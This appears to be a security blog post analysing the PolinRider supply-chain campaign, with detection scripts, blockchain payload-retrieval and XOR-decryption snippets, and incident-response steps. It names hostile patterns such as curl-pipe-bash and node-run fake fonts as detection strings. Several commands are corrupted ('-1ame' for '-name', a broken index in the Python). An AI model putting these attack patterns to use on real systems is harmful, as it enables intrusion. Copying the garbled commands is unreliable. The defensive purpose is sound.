Listen to this Post

Introduction
The software supply chain has become the new frontline in cyber warfare, and the PolinRider campaign represents one of the most sophisticated escalations seen to date. Threat actors linked to North Korea’s Contagious Interview and Famous Chollima clusters have systematically compromised legitimate GitHub maintainer accounts to publish infected package versions across npm, Packagist, Go modules, and even Chrome extensions. With 162 malicious release artifacts identified across 108 unique packages, this campaign demonstrates that no ecosystem is immune. What makes PolinRider particularly dangerous is its use of blockchain-based dead-drop infrastructure for command-and-control, making takedown efforts nearly impossible.
Learning Objectives
- Understand the full kill chain of the PolinRider supply chain attack, from GitHub account takeover to malicious package publication
- Master detection techniques for obfuscated JavaScript loaders hidden in configuration files and fake .woff2 font files
- Learn to audit VS Code task configurations and identify malicious “runOn: folderOpen” auto-execution vectors
- Implement forensic investigation procedures and remediation strategies for compromised developer environments
- Deploy supply chain security tools including GuardDog, Socket, and custom detection scripts across Linux and Windows
1. The Anatomy of GitHub Maintainer Account Takeover
PolinRider operators gain maintainer access through a combination of tactics: compromising GitHub accounts via credential theft, abusing account recovery mechanisms, or taking over expired domains associated with developer profiles. Once inside, attackers perform bulk modifications across multiple repositories within narrow time windows—a pattern clearly observed in the Xpos587 GitHub account, where several unrelated repositories were modified on June 23, 2026.
Step-by-Step Guide: Auditing for Account Compromise
- Review GitHub Activity Logs: Navigate to any repository → Insights → Activity. Look for force-push events and commits with suspicious timestamps. The standard file view is unreliable because attackers use anti-dated commits to make malicious changes appear older.
-
Check for Unusual Collaboration Patterns: Run the following command to enumerate all collaborators and their recent activity:
Linux/macOS - List all collaborators with push access
curl -s -H "Authorization: token YOUR_GITHUB_TOKEN" \
"https://api.github.com/repos/OWNER/REPO/collaborators" | jq '.[] | {login, permissions}'
Windows PowerShell - Check for unexpected maintainer additions
Invoke-RestMethod -Uri "https://api.github.com/repos/OWNER/REPO/collaborators" `
-Headers @{"Authorization"="token YOUR_GITHUB_TOKEN"} | `
Select-Object login, permissions
- Detect Force-Push History Rewrites: Clone the repository and examine the reflog:
git reflog --date=iso | grep -E "force|reset" | head -20
This reveals force-push events that may indicate history rewriting.
4. Enable GitHub Security Features:
- Enforce two-factor authentication (2FA) for all organization members
- Require signed commits
- Enable branch protection rules requiring status checks
- Review and revoke unnecessary OAuth apps and SSH keys regularly
- The Hidden Payload: Obfuscated JavaScript Loaders and Fake Font Files
PolinRider employs two primary techniques to conceal malicious JavaScript loaders. The first involves embedding one-line payloads padded with massive amounts of whitespace, pushing executable code beyond the default viewport width in IDEs. The second, more sophisticated method disguises the loader inside fake `.woff2` font files—static visual assets that developers would never suspect.
Step-by-Step Guide: Detecting Hidden Loaders
- Scan for Whitespace-Padded Payloads: Check configuration files like
vite.config.js,eslint.config.js,postcss.config.mjs, and `tailwind.config.js` for abnormally long single lines.
Linux - Find files with lines exceeding 1,000 characters
find . -type f ( -1ame ".js" -o -1ame ".mjs" -o -1ame ".json" ) \
-exec awk 'length>1000 {print FILENAME":"NR":"$0}' {} \;
Windows PowerShell - Detect suspiciously long lines
Get-ChildItem -Recurse -Include .js, .mjs, .json | ForEach-Object {
$lines = Get-Content $<em>.FullName
for ($i=0; $i -lt $lines.Count; $i++) {
if ($lines[$i].Length -gt 1000) {
Write-Host "$($</em>.FullName):$($i+1): Line length $($lines[$i].Length)"
}
}
}
- Identify Fake Font Files: Search for `.woff2` files that are actually JavaScript:
Linux - Check file magic bytes (WOFF2 should start with 'wOF2')
find . -1ame ".woff2" -exec file {} \; | grep -v "WOFF2"
Examine suspicious font files for JavaScript code
find . -1ame ".woff2" -exec head -c 100 {} \; | grep -E "eval|require|function"
- Deobfuscate the Loader: Once identified, the obfuscated JavaScript can be beautified and analyzed. The loader typically reaches out to blockchain RPC services (TRON, Aptos, BNB Smart Chain) to retrieve encrypted second-stage payloads, decrypts them using embedded XOR keys, and executes via
eval().
Python XOR Decryption Script:
XOR decryption script for PolinRider payloads
def xor_decrypt(encrypted_data, key):
return bytes([encrypted_data[bash] ^ key[i % len(key)] for i in range(len(encrypted_data))])
Example usage - replace with actual hex payload
encrypted_hex = "..." Extract from blockchain transaction data
xor_key = b'...' Embedded in loader
decrypted = xor_decrypt(bytes.fromhex(encrypted_hex), xor_key)
print(decrypted.decode('utf-8', errors='ignore'))
3. Weaponized Developer Tooling: VS Code Task Auto-Execution
Perhaps the most insidious aspect of PolinRider is its abuse of developer trust within Visual Studio Code. Attackers modify `.vscode/tasks.json` files with the `”runOn”: “folderOpen”` setting, causing hidden payloads to execute automatically when a developer opens the project folder. No user interaction is required beyond granting folder trust—a step most developers perform without a second thought.
Step-by-Step Guide: Auditing VS Code Task Configurations
- Scan for Malicious Task Definitions: Check all `.vscode/tasks.json` files for the `runOn` property:
Linux - Find all tasks.json with runOn: folderOpen
find . -path "/.vscode/tasks.json" -exec grep -l '"runOn":\s"folderOpen"' {} \;
Examine the actual task commands being executed
find . -path "/.vscode/tasks.json" -exec cat {} \; | jq '.tasks[] | {label, command, runOn}'
Windows PowerShell - Detect autorun tasks
Get-ChildItem -Recurse -Path ".vscode\tasks.json" | ForEach-Object {
$content = Get-Content $<em>.FullName -Raw | ConvertFrom-Json
$content.tasks | Where-Object { $</em>.runOn -eq "folderOpen" } | `
Select-Object label, command, args
}
2. Check for Unusual Command Patterns: Attackers often execute Node.js on fake font files or run `curl | bash` commands:
Look for node executing non-JS files grep -r "node..woff2" .vscode/tasks.json grep -r "curl.bash|wget.sh" .vscode/tasks.json
- Disable Automatic Task Execution: Change VS Code’s default behavior:
// Add to VS Code settings.json
{
"task.allowAutomaticTasks": "off"
}
This prevents any `folderOpen` tasks from executing without explicit user approval.
- Audit All Developer Workstations: Run the following detection script across your organization:
!/bin/bash
PolinRider VS Code Task Scanner
echo "Scanning for malicious VS Code tasks..."
find ~/ -path "/.vscode/tasks.json" 2>/dev/null | while read -r file; do
if grep -q '"runOn":\s"folderOpen"' "$file"; then
echo "[!] SUSPICIOUS: $file"
cat "$file" | jq '.tasks[] | {label, command, runOn}'
fi
done
4. Blockchain as Bulletproof C2: The EtherHiding Technique
PolinRider represents a paradigm shift in malware command-and-control. Instead of relying on takedown-vulnerable domains, the loader retrieves encrypted second-stage payloads from immutable blockchain transactions. The technique, known as EtherHiding, uses TRON, Aptos, and Binance Smart Chain to store payloads in transaction data fields of burn addresses—transactions that can never be spent or deleted.
Step-by-Step Guide: Analyzing Blockchain-Based C2
- Extract Blockchain Addresses from Loader: Deobfuscate the JavaScript to find hard-coded blockchain addresses. Look for patterns like:
// Example pattern from PolinRider loader const tronAddress = "T..."; // TRON address const bscTxHash = "0x..."; // BSC transaction hash
- Query Blockchain Data: Use public RPC endpoints to retrieve transaction data:
Python - Query BSC transaction data
from web3 import Web3
w3 = Web3(Web3.HTTPProvider('https://bsc-dataseed.binance.org/'))
tx_hash = '0x...' Replace with extracted hash
tx = w3.eth.get_transaction(tx_hash)
payload_hex = tx.input Contains encrypted second-stage
- Decrypt with XOR Key: The embedded XOR key in the loader decrypts the blockchain-stored payload.
-
Monitor for Known Payloads: Decrypted payloads observed include DEVPOPPER (a remote access trojan) and OmniStealer (a credential and cryptocurrency wallet stealer). These deliver remote access capabilities, credential theft, and C2 functionality via socket.io.
Detection Commands:
Linux - Monitor for suspicious outbound blockchain RPC connections sudo tcpdump -i any -1 "port 443" | grep -E "tron|aptos|bsc|binance" Windows - Check for connections to blockchain RPC endpoints netstat -ano | findstr "443" | findstr "tron|aptos|bsc"
5. Forensic Investigation and Incident Response
Organizations that installed affected package versions must assume their environments are compromised. Immediate action is required to contain the threat.
Step-by-Step Incident Response Procedure
1. Preserve Forensic Artifacts: Before any remediation, capture:
- All package lockfiles (
package-lock.json,go.sum,composer.lock) - VS Code workspace settings
- System logs and network connection history
- Browser extension data (Chrome extensions are also targeted)
2. Identify Affected Developer Machines:
Linux - Find machines that installed malicious packages Check npm global packages npm list -g --depth=0 | grep -E "tailwind-color-shades|safe-validate" Check Go modules go list -m all | grep -E "github.com/Xpos587"
Windows PowerShell - Audit installed npm packages npm list -g --depth=0 | Select-String -Pattern "tailwind-color-shades|safe-validate"
3. Remove Affected Versions and Rebuild:
Remove malicious npm packages npm uninstall -g <malicious-package> Rebuild from known-good lockfiles npm ci Uses package-lock.json for exact versions go mod tidy composer install --lock
- Rotate All Exposed Secrets: From a clean machine, rotate:
– npm, GitHub, PyPI, and RubyGems tokens
– Cloud provider credentials (AWS, GCP, Azure)
– CI/CD pipeline secrets
– SSH keys and application API keys
5. Repository Audit:
Audit for suspicious edits to critical files git log --all --full-history -- \ .vscode/tasks.json \ config.js \ vite.config.js \ eslint.config.js \ postcss.config.mjs \ tailwind.config.js
6. Supply Chain Security Tooling and Prevention
Several open-source tools can help detect and prevent PolinRider-style attacks.
GuardDog by DataDog: A CLI tool that identifies malicious PyPI, npm, Go modules, GitHub Actions, and VS Code extensions through static analysis and YARA rules.
Install GuardDog pip install guarddog Scan a project directory guarddog scan npm /path/to/project Scan Go modules guarddog scan go /path/to/project
Socket: Provides real-time supply chain protection with AI-powered detection.
Install Socket CLI npm install -g @socketsecurity/cli Scan dependencies socket scan Monitor for malware in real-time socket monitor
Custom Detection Script:
!/bin/bash
Comprehensive PolinRider Detection Script
echo "[] Scanning for PolinRider indicators..."
<ol>
<li>Check for suspicious one-line payloads
echo "[] Checking for whitespace-padded payloads..."
find . -type f ( -1ame ".js" -o -1ame ".mjs" -o -1ame ".json" ) \
-exec awk 'length>1000 {print FILENAME":"NR}' {} \; 2>/dev/null</p></li>
<li><p>Check for fake font files
echo "[] Checking for suspicious .woff2 files..."
find . -1ame ".woff2" -exec file {} \; | grep -v "WOFF2"</p></li>
<li><p>Check for VS Code autorun tasks
echo "[] Checking for autorun tasks..."
find . -path "/.vscode/tasks.json" -exec grep -l '"runOn":\s"folderOpen"' {} \;</p></li>
<li><p>Check for known malicious package names
echo "[] Checking for known malicious packages..."
npm list --depth=0 2>/dev/null | grep -E "tailwind-color-shades|safe-validate"
go list -m all 2>/dev/null | grep -E "Xpos587|git2md"</p></li>
<li><p>Check for blockchain RPC connections
echo "[] Checking for blockchain C2 connections..."
sudo lsof -i -P -1 | grep -E "tron|aptos|bsc|binance" 2>/dev/null</p></li>
</ol>
<p>echo "[] Scan complete."
What Undercode Say
- The immutable C2 problem: PolinRider’s use of blockchain dead-drops represents a fundamental shift that renders traditional domain takedown and IP blacklisting obsolete. Security teams must develop new capabilities to monitor blockchain transactions for malicious payloads—a skillset that remains rare in most organizations.
-
The developer is the new perimeter: By weaponizing VS Code’s convenience features, attackers have turned the developer’s own workflow against them. This campaign proves that endpoint detection must extend into developer tooling and IDE configurations, not just traditional malware signatures.
-
Ecosystem fragmentation enables scale: The expansion across npm, Packagist, Go modules, and Chrome extensions demonstrates that attackers are exploiting the fragmented nature of open-source governance. No single registry maintains comprehensive visibility across all ecosystems, creating blind spots that adversaries exploit.
-
History rewriting undermines trust: Git’s ability to rewrite history through force pushes is a feature for collaboration but a vulnerability for security. Organizations should implement branch protection policies that restrict force pushes and require signed commits for all production branches.
-
Remediation requires holistic thinking: The 7span case—where maintainers removed fake font files but missed whitespace-hidden payloads in configuration files—illustrates that partial remediation is insufficient. Incident response must encompass all hiding techniques simultaneously.
-
The campaign is modular and adaptive: The loader-based architecture means PolinRider can deliver any malware family. Defenders should treat any infection as a potential beachhead for more sophisticated follow-on attacks, not a single-purpose stealer.
-
Identity is the critical control: Account takeover is the primary enabler of this campaign. Enforcing 2FA, monitoring for suspicious OAuth app installations, and regularly reviewing account recovery methods are the most effective preventive measures organizations can implement today.
Prediction
-
+1 Expect to see PolinRider-style techniques adopted by other threat actors, including ransomware groups, as the effectiveness of blockchain-based C2 becomes more widely understood. This will democratize resilient malware infrastructure.
-
-1 The immutable nature of blockchain C2 means that once a payload is published, it cannot be retracted. Organizations will face long-term exposure to stolen credentials and compromised systems, with remediation costs potentially exceeding $10 million per major incident.
-
-1 Smaller open-source maintainers without dedicated security teams will remain the primary attack vector, as they lack the resources to implement robust account security. This will accelerate the trend toward corporate-backed open-source foundations with mandatory security requirements.
-
+1 The security community will develop new tools specifically designed to monitor blockchain transactions for malicious payloads, creating a new sub-industry in supply chain security. Expect to see commercial offerings in this space within 12–18 months.
-
-1 AI-assisted code generation may inadvertently accelerate the spread of PolinRider-style attacks, as attackers use LLMs to generate more convincing decoy packages and obfuscated loaders that evade detection by traditional static analysis.
-
+1 Increased awareness of VS Code task vulnerabilities will lead to improved default security settings in IDEs, with “runOn: folderOpen” either disabled by default or requiring explicit administrator approval. This will raise the bar for future workflow-based attacks.
-
-1 The campaign’s expansion into Chrome extensions suggests that browser extension supply chains are the next frontier. Organizations should expect attacks targeting CI/CD pipeline integrations and GitHub Actions within the next six months.
▶️ Related Video (76% Match):
https://www.youtube.com/watch?v=0wduZ3nO848
🎯Let’s Practice For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
IT/Security Reporter URL:
Reported By: Mayura Kathiresh – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅


